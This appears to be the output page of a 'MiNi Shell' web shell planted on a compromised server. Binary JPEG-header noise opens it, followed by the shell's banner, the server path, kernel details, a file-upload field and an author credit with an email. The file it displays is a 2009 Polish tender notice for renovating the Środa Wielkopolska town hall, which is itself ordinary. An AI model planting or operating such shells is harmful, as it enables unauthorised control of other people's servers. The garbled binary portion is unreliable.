JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/129717-N-2009.html

<p class="kh_header"><b>Środa Wielkopolska: Remont budynku Urzędu Miejskiego w Środzie Wielkopolskiej ul. Daszyńskiego 5</b><br>
<b>Numer ogłoszenia: 129717 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Środzie Wlkp. , ul. Ignacego Daszyńskiego 5, 63-000 Środa Wielkopolska, woj. wielkopolskie, tel. 061 2867700, faks 061 2867702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sroda.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku Urzędu Miejskiego w Środzie Wielkopolskiej ul. Daszyńskiego 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont budynku Urzędu Miejskiego w Środzie Wielkopolskiej ul. Daszyńskiego 5.
Zamawiający dopuszcza składanie ofert częściowych
Przedmiot zamówienia został podzielony na  2 części (zadania) 
zadanie nr 1- zmiana kolorystyki elewacji budynku wraz z przebudową wejść,
zadanie nr 2- przebudowa skrzydła budynku dla potrzeb windy
Zakres zamówienia nie obejmuje wykonania  prac związanych z cokołem budynku
zawartych w dokumentacji projektowej.  
zakres robót:   
zadanie nr 1: roboty remontowe elewacji wraz z malowaniem, przebudowa wejść, remont tarasów,                                                      
zadanie nr 2: roboty -  rozbiórkowe, ziemne i fundamentowe, izolacyjne poziome i pionowe,  budowlane, dach konstrukcja i pokrycie + docieplenie więźby  dachowej, wykonanie odwodnienia liniowego, elewacja, wykonanie podjazdu dla osób niepełnosprawnych, instalacji elektrycznej, dostawa i  montaż windy  z przystosowaniem dla  osób niepełnosprawnych. 
 Parametry windy: 
 -  udźwig Q= 100kg, ilość osób 13, prędkość jazdy V= 1,0 m/s, napęd elektryczny 
    bezreduktorowy, moc silnika napędowego 7,0 kW, wysokość nadszybia 360 cm, głębokość podszybia 140 cm, hak o nośności 10 kN, belka zawieszenia lin IPN 220.
W ramach zamówienia Wykonawca sporządzi niezbędną dokumentację do rejestracji windy i ją zarejestruje w Urzędzie Dozoru Technicznego. Dokona  prób, odbioru i rozruchu windy z udziałem wymaganych instytucji, w tym UDT i Zamawiającego. 
Przeszkoli pracowników Zamawiającego w zakresie obsługi i eksploatacji windy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki wymagane od wykonawców uczestniczących w przetargu:
     - spełnianie wymagań określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  (Dz. U. z  2007 r. nr 223, poz. 1655 ze zm.), tj.
a)	posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym, i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) 	znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 	zamówienia; 
d)	nie podleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy 	Prawo zamówień publicznych.
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w   postępowaniu metodą spełnia - nie spełnia na podstawie oświadczeń i innych dokumentów załączonych do oferty przez wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykaz oświadczeń i dokumenty potwierdzające spełnienie przez wykonawców wymaganych warunków: 
      Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu  określonych w art. 22 ust. 1 - Wykonawca składa oświadczenie, którego wzór stanowi Załącznik Nr 2 do SIWZ-  dla zadania nr 1 i zadania nr 2.

        2.   W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności   lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:
              a)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
                   ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed 
                   upływem terminu składania ofert - dla zadania nr 1 i zadania nr 2,
b) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej, niż 3 miesiące przed upływem terminu składania ofert - dla zadania nr 1 i zadania nr 2.
    
3.  W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej    
     wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia    
     do oferty dołączyć należy:
a)  Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości, dat i miejsca wykonania ( Należy wykazać min. 1 zrealizowane zadanie, obejmujące roboty nowe lub naprawcze z pomalowaniem elewacji na jednym obiekcie o powierzchni min. 1400 m2. Jako 1 zadanie należy traktować zrealizowany zakres rzeczowy na podstawie jednorazowej umowy zawartej bezpośrednio pomiędzy wykonawcą a zamawiającym.
     Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 4 do niniejszej SIWZ- dla zadania nr 1.
     b) Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj.  przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres  prowadzenia   działalności jest krótszy - w tym okresie, robót ogólnobudowlanych  stanowiących przedmiot zamówienia z podaniem ich wartości, dat i miejsca wykonania. Należy  wykazać min. 1 zrealizowane zadanie,  które  będzie obejmowało roboty  budowlane w tym dostawę i montaż windy,  wartości brutto nie mniejszej  niż   400.000 zł. Jako 1 zadanie należy traktować zrealizowany zakres rzeczowy na  podstawie jednorazowej umowy zawartej bezpośrednio pomiędzy wykonawcą  a zamawiającym.
Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że  
           roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz  należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 4 do niniejszej   SIWZ- dla zadania nr 2.
      c)  przedstawi wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na  temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych  do wykonania zamówienia a także wykonywanych przez nie czynności  wskażą  osobę na stanowisko:
  - kierownika budowy posiadającą uprawnienia budowlane w specjalności 
    konstrukcyjno-budowlanej z przynależnością do właściwej izby samorządu 
    zawodowego - dla zadania nr 1 i zadania nr 2.
     
 4.  W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę  w   sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  Wykonawca przedstawi:
      a)   polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest    ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej        
            działalności gospodarczej na  wartość  nie mniejszą niż 200.000 PLN dla zadania   nr 1,  nie mniejsza niż 300.000 PLN dla zadania nr 2,                

5.  pełnomocnictwo w oryginale do podpisywania oferty lub kserokopia pełnomocnictwa  poświadczona przez notariusza (pełnomocnictwo nie jest wymagane, jeżeli podpisujący  jest lub są właścicielami firmy lub jeżeli są oni wymienieni z imienia i nazwiska w  dokumencie rejestrowym);.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.srodawlkp.biuletyn.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Środzie Wielkopolskiej ul. Daszyńskiego, 63-000 Środa Wielkopolska,
pokój nr 217.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 10:00, miejsce: Urząd Miejski w Środzie Wielkopolskiej ul. Daszyńskiego 5, pokój nr 214 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 30.09.2009.</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1- zmiana kolorystyki elewacji budynku wraz z przebudową wejść..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty remontowe elewacji wraz z malowaniem, przebudowa wejść, remont   
 tarasów.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.31.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2- przebudowa skrzydła budynku dla potrzeb windy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: roboty -  rozbiórkowe, ziemne i fundamentowe, izolacyjne poziome i pionowe, 
 budowlane, dach konstrukcja i pokrycie + docieplenie więźby  dachowej, wykonanie
 odwodnienia liniowego, elewacja, wykonanie podjazdu dla osób niepełnosprawnych,  
 instalacji elektrycznej, dostawa i  montaż windy  z przystosowaniem dla  osób  
 niepełnosprawnych. 
 Parametry windy: 
 -  udźwig Q= 100kg, ilość osób 13, prędkość jazdy V= 1,0 m/s, napęd elektryczny 
    bezreduktorowy, moc silnika napędowego 7,0 kW, wysokość nadszybia 360 cm, głębokość 
    podszybia 140 cm, hak o nośności 10 kN, belka zawieszenia lin IPN 220..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.31.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com